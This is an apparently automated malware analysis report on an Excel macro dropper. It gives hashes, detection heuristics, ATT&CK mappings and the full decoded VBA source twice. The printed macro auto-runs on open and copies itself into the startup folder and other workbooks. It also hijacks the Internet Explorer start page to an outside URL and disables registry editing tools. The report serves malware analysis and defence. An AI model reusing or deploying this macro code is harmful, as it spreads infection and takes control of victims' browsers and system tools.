Xls.Dropper.Agent-7145543-0 Office (OLE) malware analysis — malicious · 4597cf4065730360

MALICIOUS

Office (OLE)

2.34 MB Created: 2006-09-16 00:00:00 Authoring application: Microsoft Excel First seen: 2019-03-18

MD5: 0d07153033673ba0ba081daeeffaed38 SHA-1: 70ac7a1ab39c585752eff2d6ee92ba7f7b8d7e61 SHA-256: 4597cf40657303606c7d4aefd87d981f0570e38b98f37f19f15403935b260698

270 Risk Score

Malware Insights

Xls.Dropper.Agent-7145543-0 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is an Excel file containing VBA macros that are automatically executed upon opening. The macros utilize WScript.Shell and the Shell() function, indicating an intent to download and execute a second-stage payload. The ClamAV detection name 'Xls.Dropper.Agent-7145543-0' further supports this dropper functionality.

Heuristics 8

ClamAV: Xls.Dropper.Agent-7145543-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Dropper.Agent-7145543-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage

Matched line in script

Set OperationRegistry = CreateObject("WScript.Shell")
MyUrl = "http://3azu.taobao.com"

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

Set OperationRegistry = CreateObject("WScript.Shell")
MyUrl = "http://3azu.taobao.com"

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro

Matched line in script

Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"

Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://3azu.taobao.com In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2481 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2481 bytes
SHA-256: `c15ded264c025a7906275aeecb99949bad710a41aba565ba43d04c321cc37541`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "KING" Sub auto_open() Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14" Application.OnSheetActivate = "ck_files" End Sub Sub ck_files() Attribute ck_files.VB_ProcData.VB_Invoke_Func = " \n14" c$ = Application.StartupPath m$ = Dir(c$ & "\" & "KING.XLS") 'results If m$ = "KING.XLS" Then p = 1 Else p = 0 If ActiveWorkbook.Modules.count > 0 Then w = 1 Else w = 0 whichfile = p + w * 10 Select Case whichfile Case 10 Application.ScreenUpdating = False n4$ = ActiveWorkbook.name Sheets("KING").Visible = True Sheets("KING").Select Sheets("KING").Copy With ActiveWorkbook .Title = "" .Subject = "" .Author = "" .Keywords = "" .Comments = "" End With newname$ = ActiveWorkbook.name c4$ = CurDir() ChDir Application.StartupPath ActiveWindow.Visible = False Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & "KING.XLS", FileFormat:=xlNormal _ , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _ False, CreateBackup:=False ChDir c4$ Workbooks(n4$).Sheets("KING").Visible = False Application.OnSheetActivate = "" Application.ScreenUpdating = True Application.OnSheetActivate = "KING.XLS!ck_files" Case 1 Application.ScreenUpdating = False n4$ = ActiveWorkbook.name p4$ = ActiveWorkbook.Path s$ = Workbooks(n4$).Sheets(1).name If s$ <> "KING" Then Workbooks("KING.XLS").Sheets("KING").Copy before:=Workbooks(n4$).Sheets(1) Workbooks(n4$).Sheets("KING").Visible = False Else End If Application.OnSheetActivate = "" Application.ScreenUpdating = True Application.OnSheetActivate = "KING.XLS!ck_files" Case Else End Select Dim OperationRegistry On Error Resume Next Set OperationRegistry = CreateObject("WScript.Shell") MyUrl = "http://3azu.taobao.com" RegPath = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Start Page" OperationRegistry.RegWrite RegPath, MyUrl RegPath = "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\Internet Explorer\Main\Start Page" OperationRegistry.RegWrite RegPath, MyUrl RegPath = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools" OperationRegistry.RegWrite RegPath, "1", "REG_DWORD" Exit Sub '正常运行的话会在这里退出程序 End Sub

SHA-256: c15ded264c025a7906275aeecb99949bad710a41aba565ba43d04c321cc37541

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "KING"




Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
    Application.OnSheetActivate = "ck_files"
End Sub

Sub ck_files()
Attribute ck_files.VB_ProcData.VB_Invoke_Func = " \n14"
    c$ = Application.StartupPath
    m$ = Dir(c$ & "\" & "KING.XLS") 'results
    If m$ = "KING.XLS" Then p = 1 Else p = 0
    If ActiveWorkbook.Modules.count > 0 Then w = 1 Else w = 0
    whichfile = p + w * 10
    
Select Case whichfile
    Case 10
    Application.ScreenUpdating = False
    n4$ = ActiveWorkbook.name
    Sheets("KING").Visible = True
    Sheets("KING").Select
    Sheets("KING").Copy
    With ActiveWorkbook
        .Title = ""
        .Subject = ""
        .Author = ""
        .Keywords = ""
        .Comments = ""
    End With
    newname$ = ActiveWorkbook.name
    c4$ = CurDir()
    ChDir Application.StartupPath
    ActiveWindow.Visible = False
  Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & "KING.XLS", FileFormat:=xlNormal _
        , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
        False, CreateBackup:=False
    ChDir c4$
    Workbooks(n4$).Sheets("KING").Visible = False
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "KING.XLS!ck_files"
    Case 1
    Application.ScreenUpdating = False
    n4$ = ActiveWorkbook.name
    p4$ = ActiveWorkbook.Path
    s$ = Workbooks(n4$).Sheets(1).name
    If s$ <> "KING" Then
        Workbooks("KING.XLS").Sheets("KING").Copy before:=Workbooks(n4$).Sheets(1)
        Workbooks(n4$).Sheets("KING").Visible = False
    Else
    End If
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "KING.XLS!ck_files"
    Case Else
End Select
Dim OperationRegistry
On Error Resume Next

Set OperationRegistry = CreateObject("WScript.Shell")
MyUrl = "http://3azu.taobao.com"
RegPath = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Start Page"
OperationRegistry.RegWrite RegPath, MyUrl
RegPath = "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\Internet Explorer\Main\Start Page"
OperationRegistry.RegWrite RegPath, MyUrl

RegPath = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools"
OperationRegistry.RegWrite RegPath, "1", "REG_DWORD"

Exit Sub   '正常运行的话会在这里退出程序

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.